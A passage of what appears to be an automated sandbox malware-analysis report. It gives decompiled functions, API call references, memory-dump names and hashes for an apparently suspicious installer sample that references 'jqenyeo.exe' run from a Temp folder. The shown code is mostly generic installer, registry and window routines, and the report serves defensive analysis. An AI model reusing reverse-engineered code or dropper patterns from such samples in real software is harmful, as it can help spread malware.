							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029e7
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32 ref: 00402A06
GlobalFree.KERNEL32 ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58

Uniqueness

Uniqueness Score: -1.00%

Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}

0x00404e7a
0x00404e7f
0x00404e87
0x00404e88
0x00404e95
0x00404e9d
0x00404e9e
0x00404ea0
0x00404ea2
0x00404ea4
0x00404ea7
0x00404ea7
0x00404eae
0x00404eb4
0x00404eb4
0x00404ebb
0x00404ec2
0x00404ec5
0x00404ec8
0x00404ec8
0x00404ecc
0x00404edc
0x00404ede
0x00404ee1
0x00404e8a
0x00404e8a
0x00404e91
0x00404e91
0x00404ee9
0x00404ef4
0x00404f0a
0x00404f1b
0x00404f37

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
wsprintfW.USER32 ref: 00404F1B
SetDlgItemTextW.USER32 ref: 00404F2E

Strings

H7B, xrefs: 00404F04
%u.%u%s%s, xrefs: 00404EFC

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32 ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32 ref: 00401D9A
GetClientRect.USER32 ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32 ref: 00401E84

Part of subcall function 004066A5: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32 ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406544
0x00406546
0x0040655b
0x0040655e
0x00406563
0x00406568
0x004065a6
0x004065a6
0x0040656a
0x0040657c
0x00406587
0x0040658d
0x00406598
0x00000000
0x00000000
0x00406598
0x004065ac

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,?,?,0040679D,80000002), ref: 0040657C
RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,00422728), ref: 00406587

Strings

C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk, xrefs: 0040653D
('B, xrefs: 0040655B

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: CloseQueryValue
String ID: ('B$C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
API String ID: 3356406503-381762394
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405f38
0x00405f45
0x00405f46
0x00405f51
0x00405f59
0x00405f59
0x00405f61

APIs

